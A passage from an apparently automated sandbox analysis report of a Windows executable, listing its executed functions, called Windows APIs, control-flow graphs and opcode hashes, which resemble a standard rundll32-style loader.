AcquireSRWLockExclusive 2868->2871 2877 e13470 2868->2877 2869->2868 2872 e13469 ReleaseSRWLockShared 2870->2872 2870->2877 2873 e134ee DecodePointer 2871->2873 2874 e134de EncodePointer 2871->2874 2872->2877 2875 e13505 2873->2875 2874->2875 2876 e1350e ReleaseSRWLockExclusive 2875->2876 2875->2877 2876->2877 2877->2862 2878 e14510 CoAddRefServerProcess 2879 e16510 SetUnhandledExceptionFilter 2888 e1699d 2889 e169a2 2888->2889 2892 e15e4f LdrResolveDelayLoadedAPI 2889->2892 2891 e169af 2892->2891

                                                                                                                Executed Functions

                                                                                                                Function 00E15911 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 258nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • PathIsRelativeW.API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0(?,00000000,00000000,00000000), ref: 00E15932
                                                                                                                • RtlSetSearchPathMode.NTDLL(00008001), ref: 00E15945
                                                                                                                • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,00000104,?,?), ref: 00E15961
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?), ref: 00E159BF
                                                                                                                • CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00E159D1
                                                                                                                • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00E15A17
                                                                                                                • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00E15A38
                                                                                                                • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 00E15A59
                                                                                                                • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?), ref: 00E15A98
                                                                                                                • CreateActCtxWWorker.KERNEL32(?,?,?), ref: 00E15AB5
                                                                                                                • ActivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?,00000000,?,?), ref: 00E15AF3
                                                                                                                • SetWindowLongW.USER32(?,00000000,00000001), ref: 00E15B67
                                                                                                                • GetWindowLongW.USER32(?,00000000), ref: 00E15B77
                                                                                                                • GetWindow.USER32(?,00000003), ref: 00E15B89
                                                                                                                • memset.MSVCRT ref: 00E15BA7
                                                                                                                • GetClassNameW.USER32(00000000,?,00000050), ref: 00E15BB9
                                                                                                                • CompareStringW.API-MS-WIN-CORE-STRING-L1-1-0(0000007F,00000001,?,000000FF,IME,000000FF), ref: 00E15BD7
                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 00E15BE5
                                                                                                                • GetWindow.USER32(00000000,00000004), ref: 00E15BF0
                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 00E15BFD
                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,?), ref: 00E15C37
                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,0000001C,?,?), ref: 00E15C56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Create$LongWorker$Path$Search$ActivateAttributesClassCompareFileHandleModeModuleNameNtdllProc_RelativeStringmemset
                                                                                                                • String ID: $ $.manifest$IME$N$Qj$|
                                                                                                                • API String ID: 1028207903-2085582975
                                                                                                                • Opcode ID: 78ea605a8ec1ec116843f3ed746b85d3934746d576fc33e8ed6e68e69f314c81
                                                                                                                • Instruction ID: 704f54d2c5d8c38b1f0a2c90147554a62b1c923f267338ead0fcd0d0239f693a
                                                                                                                • Opcode Fuzzy Hash: 78ea605a8ec1ec116843f3ed746b85d3934746d576fc33e8ed6e68e69f314c81
                                                                                                                • Instruction Fuzzy Hash: 4E91A571A00619EFDB209F65DC8CFDAB7B8AF89324F104295F529F2190D7749A88CF61
                                                                                                                Function 00E14136 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 193memorylibrarynativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 51 e14136-e1416b HeapSetInformation NtSetInformationProcess 52 e1416e-e14177 51->52 52->52 53 e14179-e14195 call e16953 52->53 56 e14197-e141a6 AttachConsole 53->56 57 e141ab-e141bb LocalAlloc 53->57 56->57 58 e141c1-e141cf call e11ef1 57->58 59 e143a7-e143ae 57->59 64 e143a0-e143a1 LocalFree 58->64 65 e141d5-e141f1 call e15695 58->65 60 e143b0 FreeConsole 59->60 61 e143b6-e143b7 ExitProcess 59->61 60->61 64->59 65->64 68 e141f7-e14200 call e140b1 65->68 71 e14202-e14218 LoadLibraryExW 68->71 72 e1422c-e14231 68->72 73 e1422a 71->73 74 e1421a-e14228 GetProcAddress 71->74 75 e14233-e14242 call e140f3 72->75 76 e1425a-e1425f 72->76 73->72 74->72 85 e14393-e14395 75->85 86 e14248-e14255 call e13fe7 75->86 78 e14261-e14271 call e140f3 76->78 79 e14285-e142b0 SetErrorMode call e15911 call e15d6a 76->79 78->85 87 e14277-e14280 call e137c3 78->87 96 e14357-e1436b call e138f0 79->96 97 e142b6-e142e7 call e13e5b 79->97 88 e14397-e14398 FreeLibrary 85->88 89 e1439e 85->89 86->85 87->85 88->89 89->64 101 e14370-e14377 96->101 102 e142e9-e142ee 97->102 103 e1434b-e14355 LocalFree 97->103 101->85 104 e14379-e1437e 101->104 105 e142f0-e142f4 102->105 106 e142f8-e1431b call e13f6b call e15c6c call e140f3 102->106 103->101 107 e14380-e14386 DeactivateActCtx 104->107 108 e1438c-e1438d ReleaseActCtx 104->108 105->106 115 e14332-e14338 106->115 116 e1431d-e1432d call e14072 106->116 107->108 108->85 118 e14341-e14345 FreeLibrary 115->118 119 e1433a-e1433b DestroyWindow 115->119 116->115 118->103 119->118
                                                                                                                APIs
                                                                                                                • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00E1414D
                                                                                                                • NtSetInformationProcess.NTDLL ref: 00E14162
                                                                                                                • AttachConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0(000000FF), ref: 00E14199
                                                                                                                • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00E141B1
                                                                                                                • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(WLDP.DLL,00000000,00000800,?,?,?), ref: 00E1420E
                                                                                                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,WldpIsAllowedEntryPoint), ref: 00E14220
                                                                                                                • SetErrorMode.KERNEL32(00008001), ref: 00E1428A
                                                                                                                • DestroyWindow.USER32(?), ref: 00E1433B
                                                                                                                • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E14345
                                                                                                                • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00E1434F
                                                                                                                • DeactivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000000,00000000), ref: 00E14386
                                                                                                                • ReleaseActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?), ref: 00E1438D
                                                                                                                  • Part of subcall function 00E137C3: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00E137D4
                                                                                                                  • Part of subcall function 00E137C3: CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00E119CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00E137F0
                                                                                                                  • Part of subcall function 00E137C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00E13808
                                                                                                                  • Part of subcall function 00E137C3: GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00E1381D
                                                                                                                  • Part of subcall function 00E137C3: CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00E13866
                                                                                                                  • Part of subcall function 00E137C3: SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00E13873
                                                                                                                  • Part of subcall function 00E137C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E1387A
                                                                                                                  • Part of subcall function 00E137C3: CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00E18420,?), ref: 00E13897
                                                                                                                  • Part of subcall function 00E137C3: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00E138D9
                                                                                                                  • Part of subcall function 00E137C3: CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00E138E7
                                                                                                                • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E14398
                                                                                                                • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00E143A1
                                                                                                                • FreeConsole.API-MS-WIN-CORE-CONSOLE-L1-2-0 ref: 00E143B0
                                                                                                                • ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00E143B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$EventLibraryLocal$CloseConsoleCreateHandleInformationInitializeProcess$AddressAllocAttachCurrentDeactivateDestroyErrorExitHandlesHeapLoadModeMultipleProcReleaseSecurityThreadUninitializeWaitWindow
                                                                                                                • String ID: WLDP.DLL$WldpIsAllowedEntryPoint$localserver$requestedRunLevel
                                                                                                                • API String ID: 3009286836-3890604504
                                                                                                                • Opcode ID: d7e45284c00077fa63b478dd751e0f981203565cd9ffbd69f7f191c724e464aa
                                                                                                                • Instruction ID: 7469631d59dfde77f7593fc501b7144cdce285ab86df01d11c7c6f0c79a02901
                                                                                                                • Opcode Fuzzy Hash: d7e45284c00077fa63b478dd751e0f981203565cd9ffbd69f7f191c724e464aa
                                                                                                                • Instruction Fuzzy Hash: 3C615BB12043019FD710DF61D855AEFB7E5AF88714F049A29F9A6B22E1DB30C989CB52
                                                                                                                Function 00E15D6A Relevance: 10.6, APIs: 7, Instructions: 87nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 168 e15d6a-e15d9f NtOpenProcessToken RtlNtStatusToDosError 169 e15da1-e15daa 168->169 170 e15dac 168->170 169->170 171 e15dc7-e15dce 170->171 172 e15dae-e15db4 call e15cf1 170->172 174 e15dd0-e15dd2 171->174 175 e15e3e-e15e4e call e161b0 171->175 177 e15db9-e15dc4 NtClose 172->177 174->175 178 e15dd4-e15dd6 174->178 177->171 180 e15dd8-e15ddb 178->180 181 e15dfa-e15dfd 178->181 180->181 182 e15ddd-e15df5 QueryActCtxW 180->182 183 e15e08-e15e1b NtOpenProcessToken 181->183 184 e15dff-e15e02 181->184 182->181 185 e15df7 182->185 183->175 187 e15e1d-e15e38 NtSetInformationToken NtClose 183->187 184->175 186 e15e04-e15e06 184->186 185->181 186->175 187->175
                                                                                                                APIs
                                                                                                                • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00E15D8E
                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 00E15D95
                                                                                                                • NtClose.NTDLL ref: 00E15DBE
                                                                                                                • QueryActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(80000000,00000000,00000000,00000005,?,0000000C,00000000), ref: 00E15DED
                                                                                                                • NtOpenProcessToken.NTDLL(000000FF,00000080,?), ref: 00E15E13
                                                                                                                • NtSetInformationToken.NTDLL ref: 00E15E2F
                                                                                                                • NtClose.NTDLL ref: 00E15E38
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Token$CloseOpenProcess$ErrorInformationQueryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 3674487995-0
                                                                                                                • Opcode ID: f03b18247f4cb333afd65284cfb6d2e87a3cf700e72be052233959325228a60b
                                                                                                                • Instruction ID: 5e840bf56cd525dfa40d6e1b2734a2db663940aa7e18c6b1e22645d144633553
                                                                                                                • Opcode Fuzzy Hash: f03b18247f4cb333afd65284cfb6d2e87a3cf700e72be052233959325228a60b
                                                                                                                • Instruction Fuzzy Hash: D221A233E00619AFDB209FA59D49BEF7B78AB84725F110214EA11B71E0DA709D84C7A1
                                                                                                                Function 00E13C66 Relevance: 7.6, APIs: 5, Instructions: 84librarywindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 189 e13c66-e13c91 LoadLibraryExW 190 e13c93-e13c9e GetLastError 189->190 191 e13d12-e13d1b RtlImageNtHeader 189->191 194 e13ca0-e13ca9 call e13b09 190->194 195 e13cdb-e13ced 190->195 192 e13d51 191->192 193 e13d1d-e13d26 191->193 198 e13d53-e13d61 call e161b0 192->198 193->192 197 e13d28-e13d4b SetProcessMitigationPolicy 193->197 205 e13cb2-e13cd9 194->205 206 e13cab-e13cad 194->206 196 e13cf2-e13cfa FormatMessageW 195->196 196->192 200 e13cfc-e13d10 call e138f0 196->200 197->192 200->192 205->196 206->198
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00E13C87
                                                                                                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00E13C93
                                                                                                                • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,00000000,00000000,?,00000104,00000000,?,00000000,00000008), ref: 00E13CF2
                                                                                                                  • Part of subcall function 00E13B09: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00E13B39
                                                                                                                  • Part of subcall function 00E13B09: IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00E13B40
                                                                                                                  • Part of subcall function 00E13B09: GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00E13B6C
                                                                                                                  • Part of subcall function 00E13B09: PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00E13B87
                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00E13D13
                                                                                                                • SetProcessMitigationPolicy.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000000,?,00000008,?,00000000,00000008), ref: 00E13D4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$AppendCurrentDirectoryErrorFormatHeaderImageLastLibraryLoadMessageMitigationPathPolicyProcess2SystemWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 4162338769-0
                                                                                                                • Opcode ID: b03e5a00fb8a5f445f41c2979f803c597596bc35fb42805b1f8dc34b09fab369
                                                                                                                • Instruction ID: 0be2da90a22d9b21ffadb7e2ee155e9bece4483e70389426e6e3627f98462f58
                                                                                                                • Opcode Fuzzy Hash: b03e5a00fb8a5f445f41c2979f803c597596bc35fb42805b1f8dc34b09fab369
                                                                                                                • Instruction Fuzzy Hash: 3B2171B06402186EFB24DB359C89FFA76BDEBD4700F149169F509F6191DAB08FC48A71
                                                                                                                Function 00E15CF1 Relevance: 4.6, APIs: 3, Instructions: 53nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 228 e15cf1-e15d21 NtQueryInformationToken 229 e15d23-e15d27 228->229 230 e15d4c-e15d55 RtlNtStatusToDosError 228->230 231 e15d29-e15d2d 229->231 232 e15d4b 229->232 233 e15d61 230->233 234 e15d57-e15d5f 230->234 231->230 235 e15d2f-e15d44 NtQueryInformationToken 231->235 232->230 236 e15d63 233->236 237 e15d65-e15d69 233->237 234->233 235->230 238 e15d46-e15d49 235->238 236->237 238->230 238->232
                                                                                                                APIs
                                                                                                                • NtQueryInformationToken.NTDLL ref: 00E15D17
                                                                                                                • NtQueryInformationToken.NTDLL ref: 00E15D3C
                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 00E15D4D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationQueryToken$ErrorStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1049779487-0
                                                                                                                • Opcode ID: 43c4219de079094ce77a24ffc52868678f89d3ceb4be5d2ddea80c65ff0b3ac6
                                                                                                                • Instruction ID: c923e5849429b991482a008ae4645bf863e9d0a5805aebb9bd70283af84f0f8c
                                                                                                                • Opcode Fuzzy Hash: 43c4219de079094ce77a24ffc52868678f89d3ceb4be5d2ddea80c65ff0b3ac6
                                                                                                                • Instruction Fuzzy Hash: 4D01B572A00218FBEB209AA1EC4DBEF7BFCEB80755F104061AA01F6051D374D948C761
                                                                                                                Function 00E140B1 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 239 e140b1-e140da NtQuerySystemInformation 240 e140e4-e140f2 call e161b0 239->240 241 e140dc-e140e0 239->241 241->240 242 e140e2 241->242 242->240
                                                                                                                APIs
                                                                                                                • NtQuerySystemInformation.NTDLL ref: 00E140D2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationQuerySystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3562636166-0
                                                                                                                • Opcode ID: 9a47a71b99336180d264d5f3a72dd135eecc82a7848dba545b0aaa193c1c208e
                                                                                                                • Instruction ID: 578fea3889db5a079631957238731305cd5b6ee8dc794487c94d6be8b6c5339d
                                                                                                                • Opcode Fuzzy Hash: 9a47a71b99336180d264d5f3a72dd135eecc82a7848dba545b0aaa193c1c208e
                                                                                                                • Instruction Fuzzy Hash: 31E0927470030C6FE710DFA69985BEEBBEC9B48708F15602AEA41B72C1D9B0E848D621
                                                                                                                Function 00E15E4F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 245 e15e4f-e15e78 LdrResolveDelayLoadedAPI
                                                                                                                APIs
                                                                                                                • LdrResolveDelayLoadedAPI.NTDLL(00E10000,?,?), ref: 00E15E71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DelayLoadedResolve
                                                                                                                • String ID:
                                                                                                                • API String ID: 841769287-0
                                                                                                                • Opcode ID: c90928275fa1abe61f09e1f1791bfb77294f9199c073b59e1c594316bf6ead95
                                                                                                                • Instruction ID: 87d4029ccc8bd5578f6cfc9189511b280b49d6d67e891359e9059e6e03545783
                                                                                                                • Opcode Fuzzy Hash: c90928275fa1abe61f09e1f1791bfb77294f9199c073b59e1c594316bf6ead95
                                                                                                                • Instruction Fuzzy Hash: 69D0C53A045288BF8F425FC3AC25DC97F2AE79C761B01C046F72825031C6729568AB61
                                                                                                                Function 00E15F25 Relevance: 10.6, APIs: 7, Instructions: 138sleepCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 120 e15f25-e15f4c call e167e8 GetStartupInfoW 123 e15f4e-e15f5d 120->123 124 e15f77-e15f79 123->124 125 e15f5f-e15f61 123->125 128 e15f7a-e15f80 124->128 126 e15f63-e15f68 125->126 127 e15f6a-e15f75 Sleep 125->127 126->128 127->123 129 e15f82-e15f8a _amsg_exit 128->129 130 e15f8c-e15f92 128->130 131 e15fc6-e15fcc 129->131 132 e15fc0 130->132 133 e15f94-e15fad call e16100 130->133 134 e15fe9-e15feb 131->134 135 e15fce-e15fdf _initterm 131->135 132->131 133->131 142 e15faf-e15fbb 133->142 137 e15ff6-e15ffd 134->137 138 e15fed-e15ff4 134->138 135->134 140 e16022-e1602b 137->140 141 e15fff-e1600c call e16640 137->141 138->137 140->142 145 e1602d-e16033 140->145 141->140 150 e1600e-e16020 141->150 143 e160f0-e160ff 142->143 147 e16036-e1603c 145->147 148 e1608d-e16090 147->148 149 e1603e-e16041 147->149 153 e16092-e1609b 148->153 154 e1609e-e160a4 148->154 151 e16043-e16045 149->151 152 e1605c-e16060 149->152 150->140 151->148 155 e16047-e1604a 151->155 156 e16062-e16066 152->156 157 e16068-e1606a 152->157 153->154 154->147 159 e160d5-e160dc 154->159 155->152 160 e1604c-e1604f 155->160 161 e1606b-e16073 call e14136 156->161 157->161 162 e160e9 159->162 163 e160de-e160e4 _cexit 159->163 160->152 164 e16051-e1605a 160->164 166 e16078-e16084 161->166 162->143 163->162 164->155 166->159 167 e16086-e16087 exit 166->167 167->148
                                                                                                                APIs
                                                                                                                • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00E16C20,00000058), ref: 00E15F3A
                                                                                                                • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8), ref: 00E15F6F
                                                                                                                • _amsg_exit.MSVCRT ref: 00E15F84
                                                                                                                • _initterm.MSVCRT ref: 00E15FD8
                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00E16004
                                                                                                                • exit.MSVCRT ref: 00E16087
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2849151604-0
                                                                                                                • Opcode ID: 5c26e41573fd36c83c505745fbc91a87ba951696e37dd8c51a381cee2ffcbb96
                                                                                                                • Instruction ID: 374cd706a6f79001cffb6c770f930e8f65921b8af3584576b8ea05022ab6dceb
                                                                                                                • Opcode Fuzzy Hash: 5c26e41573fd36c83c505745fbc91a87ba951696e37dd8c51a381cee2ffcbb96
                                                                                                                • Instruction Fuzzy Hash: A241E072A01712DFEB349F59D9457E976A0EB48759F20A02EE811B72D0CF708CC9CA54
                                                                                                                Function 00E15C6C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48registrywindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(?,00000064), ref: 00E15C95
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00E15CA4
                                                                                                                • RegisterClassW.USER32(?), ref: 00E15CC7
                                                                                                                • CreateWindowExW.USER32(00000080,RunDLL,00E119A0,00000000,80000000,80000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00E15CE6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$ClassCreateCursorIconRegisterWindow
                                                                                                                • String ID: RunDLL
                                                                                                                • API String ID: 1446224504-1316671358
                                                                                                                • Opcode ID: 5ea1653883be83631f52e29593aafc03d0215477e39d85edb88b0e49c1b219b9
                                                                                                                • Instruction ID: 6cc8f78e955811db623d3daea13f5a587156b4f04cc096cd7b73d69b2da180da
                                                                                                                • Opcode Fuzzy Hash: 5ea1653883be83631f52e29593aafc03d0215477e39d85edb88b0e49c1b219b9
                                                                                                                • Instruction Fuzzy Hash: E601A9B1D00218AFEB109F9A9C89AEFBABCFB8C754F508059F514B2240D77459458BB4
                                                                                                                Function 00E13E5B Relevance: 6.1, APIs: 4, Instructions: 108memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 208 e13e5b-e13e9c call e13c66 211 e13f62-e13f68 208->211 212 e13ea2-e13eb7 call e13d62 208->212 215 e13f46-e13f49 212->215 216 e13ebd-e13ec2 212->216 217 e13f4e-e13f5c call e138f0 FreeLibrary 215->217 218 e13ec4-e13ec6 216->218 219 e13f29-e13f39 216->219 217->211 218->219 221 e13ec8-e13ecd 218->221 219->211 221->219 223 e13ecf-e13ed1 221->223 224 e13ed4-e13edd 223->224 224->224 225 e13edf-e13f0a WideCharToMultiByte LocalAlloc 224->225 226 e13f3b-e13f44 225->226 227 e13f0c-e13f27 WideCharToMultiByte 225->227 226->217 227->219
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00E13C66: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000008), ref: 00E13C87
                                                                                                                  • Part of subcall function 00E13C66: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 00E13C93
                                                                                                                  • Part of subcall function 00E13D62: _wtoi.MSVCRT(?), ref: 00E13D94
                                                                                                                  • Part of subcall function 00E13D62: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00E13DA0
                                                                                                                • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 00E13EF5
                                                                                                                • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000), ref: 00E13F00
